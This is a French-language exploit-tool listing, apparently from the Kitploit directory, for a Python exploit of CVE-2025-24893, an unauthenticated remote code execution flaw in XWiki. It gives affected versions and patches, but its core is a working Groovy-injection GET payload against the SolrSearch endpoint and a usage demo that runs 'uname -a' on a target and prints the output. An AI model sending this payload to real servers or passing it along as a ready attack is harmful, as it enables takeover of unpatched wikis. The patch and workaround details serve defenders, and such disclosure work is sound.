Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — Exploit Python pour CVE-2025-24893, une RCE critique non authentifiée dans XWiki Platform, permettant l'exécution arbitraire de code Groovy via une requête RSS malveillante vers le point de terminaison SolrSearch. | Kitploit
Outils/GitHubGitHub/b0ysie7e/cve-2025-24893
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Exploit Python pour CVE-2025-24893, une RCE critique non authentifiée dans XWiki Platform, permettant l'exécution arbitraire de code Groovy via une requête RSS malveillante vers le point de terminaison SolrSearch.

Voir le dépôt
113il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2025-24893

CVE-2025-24893 est une vulnérabilité critique d'exécution de code à distance (RCE) sans authentification affectant la plateforme XWiki.
Cette faille permet à tout utilisateur invité d'injecter et d'exécuter du code Groovy arbitraire — sans authentification — via une requête RSS spécialement conçue vers l'endpoint SolrSearch.

Cela impacte directement la confidentialité, l'intégrité et la disponibilité du système affecté.

Résumé

  • Versions affectées :
    • XWiki ≥ 5.3-milestone-2 jusqu'à < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 jusqu'à < 16.4.1
  • Score CVSS v3.1 : 9.8 (Critique)
    Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Exploitabilité : Très facile — une seule requête HTTP GET suffit.

⚠️ Avertissement :

Ce code est strictement destiné à des fins éducatives et de recherche uniquement. Toute utilisation non autorisée sur des systèmes sans autorisation explicite peut constituer une violation de la loi. L'auteur décline toute responsabilité en cas d'utilisation abusive ou d'activité malveillante impliquant cet outil.

Preuve de concept (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Manuel d'utilisation du script d'exploitation

Cette section explique comment installer et exécuter le script d'exploitation Python afin de tirer parti de la vulnérabilité CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Atténuation

Mise à jour vers les versions corrigées :

Pour corriger la vulnérabilité, mettez à jour XWiki vers l'une des versions suivantes :

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Contournement temporaire :

Si une mise à jour n'est pas immédiatement possible, vous pouvez appliquer un correctif temporaire :

  1. Modifiez le fichier SolrSearchMacros.xml (situé dans Main.SolrSearchMacros) autour de la ligne 955.
  2. Remplacez la logique de sortie pour utiliser la macro rawResponse avec le type de contenu défini sur application/xml.
    Utilisez comme référence l'implémentation trouvée dans macros.vm à la ligne 2824.

Références :

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
Télécharger l’outil